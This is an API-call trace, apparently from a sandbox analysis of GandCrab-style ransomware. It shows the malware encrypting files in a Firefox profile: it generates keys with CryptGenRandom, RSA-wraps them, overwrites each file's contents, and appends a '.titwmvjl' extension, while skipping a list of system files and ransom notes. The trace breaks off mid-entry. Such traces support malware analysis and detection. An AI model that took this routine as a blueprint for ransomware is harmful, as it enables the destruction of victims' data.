(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned 101 [0080.027] VirtualAlloc (lpAddress=0x0, dwSize=0x10a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.028] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json.titwmvjl") returned 110 [0080.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned 101 [0080.028] lstrlenW (lpString=".json") returned 5 [0080.028] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.028] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".json ") returned 6 [0080.028] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0080.028] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned 101 [0080.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned 101 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="desktop.ini") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="autorun.inf") returned 1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="ntuser.dat") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="iconcache.db") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="bootsect.bak") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="boot.ini") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="ntuser.dat.log") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="thumbs.db") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="KRAB-DECRYPT.html") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="CRAB-DECRYPT.html") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="ntldr") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="NTDETECT.COM") returned -1 [0080.028] lstrcmpiW (lpString1="blocklist-addons.json", lpString2="Bootfont.bin") returned -1 [0080.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned 101 [0080.028] lstrlenW (lpString=".json") returned 5 [0080.028] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.029] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".json ") returned 6 [0080.029] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.029] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.029] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.030] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.030] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0080.040] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.040] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.041] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.043] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.044] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.044] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.044] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.044] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.044] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.045] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.047] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.047] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.048] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.048] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.048] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.048] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.048] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.051] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.052] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5034b8) returned 1 [0080.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.052] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.052] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.052] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.053] GetLastError () returned 0x0 [0080.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.053] CryptDestroyKey (hKey=0x5034b8) returned 1 [0080.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.053] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.053] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.053] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.056] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503338) returned 1 [0080.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.056] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.056] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.056] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.057] GetLastError () returned 0x0 [0080.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.057] CryptDestroyKey (hKey=0x503338) returned 1 [0080.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.057] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.057] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.057] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.057] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x70608, lpOverlapped=0x0) returned 1 [0080.091] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff8f9f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.092] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x70608, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x70608, lpOverlapped=0x0) returned 1 [0080.103] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.103] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.105] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.108] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.110] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.110] CloseHandle (hObject=0x2d4) returned 1 [0080.117] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-addons.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-addons.json.titwmvjl"), dwFlags=0x1) returned 1 [0080.118] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.118] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.118] lstrcmpW (lpString1="blocklist-gfx.json", lpString2=".") returned 1 [0080.118] lstrcmpW (lpString1="blocklist-gfx.json", lpString2="..") returned 1 [0080.118] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="blocklist-gfx.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json" [0080.118] lstrlenW (lpString=".titwmvjl") returned 9 [0080.118] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned 98 [0080.118] VirtualAlloc (lpAddress=0x0, dwSize=0x104, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.119] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json.titwmvjl") returned 107 [0080.119] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned 98 [0080.119] lstrlenW (lpString=".json") returned 5 [0080.119] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.119] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".json ") returned 6 [0080.119] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0080.119] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.119] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned 98 [0080.119] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned 98 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="desktop.ini") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="autorun.inf") returned 1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="ntuser.dat") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="iconcache.db") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="bootsect.bak") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="boot.ini") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="ntuser.dat.log") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="thumbs.db") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="KRAB-DECRYPT.html") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="CRAB-DECRYPT.html") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="ntldr") returned -1 [0080.119] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="NTDETECT.COM") returned -1 [0080.120] lstrcmpiW (lpString1="blocklist-gfx.json", lpString2="Bootfont.bin") returned -1 [0080.120] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json") returned 98 [0080.120] lstrlenW (lpString=".json") returned 5 [0080.120] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.120] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".json ") returned 6 [0080.120] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.120] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.120] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-gfx.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.121] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.121] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0080.122] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.122] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.122] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.126] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.126] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.126] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.126] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.126] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.126] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.126] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.126] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.129] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.130] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.130] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.130] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.130] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.130] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.130] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.130] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.148] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.152] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503838) returned 1 [0080.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.152] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.152] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.152] GetLastError () returned 0x0 [0080.152] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.153] CryptDestroyKey (hKey=0x503838) returned 1 [0080.153] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.153] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.153] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.153] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.156] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.156] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503978) returned 1 [0080.156] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.156] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.156] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.157] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.157] GetLastError () returned 0x0 [0080.157] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.157] CryptDestroyKey (hKey=0x503978) returned 1 [0080.157] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.157] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.157] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.157] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.158] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x6d31, lpOverlapped=0x0) returned 1 [0080.171] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffff92cf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.171] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6d31, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x6d31, lpOverlapped=0x0) returned 1 [0080.172] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.172] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.173] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.177] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.177] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.178] CloseHandle (hObject=0x2d4) returned 1 [0080.180] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-gfx.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-gfx.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\blocklist-gfx.json.titwmvjl"), dwFlags=0x1) returned 1 [0080.181] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.181] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.181] lstrcmpW (lpString1="blocklist-plugins.json", lpString2=".") returned 1 [0080.181] lstrcmpW (lpString1="blocklist-plugins.json", lpString2="..") returned 1 [0080.181] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="blocklist-plugins.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json" [0080.181] lstrlenW (lpString=".titwmvjl") returned 9 [0080.181] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned 102 [0080.181] VirtualAlloc (lpAddress=0x0, dwSize=0x10c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.182] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json.titwmvjl") returned 111 [0080.182] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned 102 [0080.182] lstrlenW (lpString=".json") returned 5 [0080.182] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.182] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".json ") returned 6 [0080.182] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0080.182] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.182] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned 102 [0080.182] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-plugins.json") returned 102 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="desktop.ini") returned -1 [0080.182] lstrcmpiW (lpString1="blocklist-plugins.json", lpString2="autorun.inf") returned 1 [0080.182] 